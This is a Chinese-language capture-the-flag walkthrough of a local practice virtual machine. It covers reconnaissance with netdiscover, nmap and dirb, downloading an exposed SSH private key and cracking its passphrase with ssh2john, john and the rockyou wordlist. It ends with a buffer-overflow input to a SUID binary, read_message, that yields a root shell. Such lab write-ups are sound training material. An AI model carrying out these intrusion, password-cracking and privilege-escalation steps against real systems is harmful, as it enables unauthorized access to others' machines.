(本机ip地址192.168.95.141)
第一步 扫描ip地址
netdiscover -r 192.168.95.1/24
判断分析出192.168.95.139为靶场ip地址
****也可以使用nmap进行扫描*****
****nmap -sP 192.168.95.1/24****
第二步 识别靶场的相关信息
使用nmap对靶场操作系统服务及版本号进行识别
nmap -sV 192.168.95.139
扫描到靶场中有特殊端口31337,此时使用浏览器进入端口
进入后发现没有什么用;
查看源代码
也没有什么可用的信息
第三部通过kali终端使用命令打开端口
使用命令
dirb http://192.168.95.139:31337/
发现文件robots.txt
使用浏览器打开(http://192.168.95.139:31337/robots.txt)
发现taxes文件
进入taxes文件(http://192.168.95.139:31337/taxes)
得到flag1
第四部
使用命令进入ssh
http://192.168.95.139:31337/.ssh
将图中三个文件下载下来,这里给大家一个示范
下载好了三个文件后,可以在这里找到
可以把它们拖到桌面上方便后续操作
使用cd Desktop进入桌面
在使用ll查看文件权限
注明:我这里文件已经给了权限,有些没给权限的后面没法操作
可以使用 chmod 777 id_rsa 给与权限
在使用ll查看
点击桌面authorized文件可以得到用户名称:simon
使用命令 :ssh -i id_rsa simon@192.168.95.139 进行登录
输入yes进行确认
此时我们没有密码
我们对得到的文件进行解密
locate ssh2john
/usr/share/john/ssh2john.py ssh2john id_rsa > rsacrack
利用字典进行解密
zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules rsacrack
得到密码:starwars
再次尝试登录
登录成功,但我们还没有root权限
现在查找root权限文件
find / -perm -4000 2>/dev/null
发现read_message文件
进入root,发现文件read_message.c文件
cat read_message.c打开文件得到flag2
read_message
输入SimonAAAAAAAAAAAAAAA/bin/sh(注释:前五个一定要写Simon‘s是大写’,后面随便写满15个)
(能力要求:代码审计,会代码的要看懂代码意思)
此时,以获得root权限
输入:cat flag.txt
并获得flag3
注意:1.注意命令大小写和空格
2.查找到的用户名首字母有时候需要大写,有时候需要小写
3。实际操作过程中可能还存在路径问题,要注意自己在什么路径打开什么文件
可尝试使用cd来解决,解决不了就算了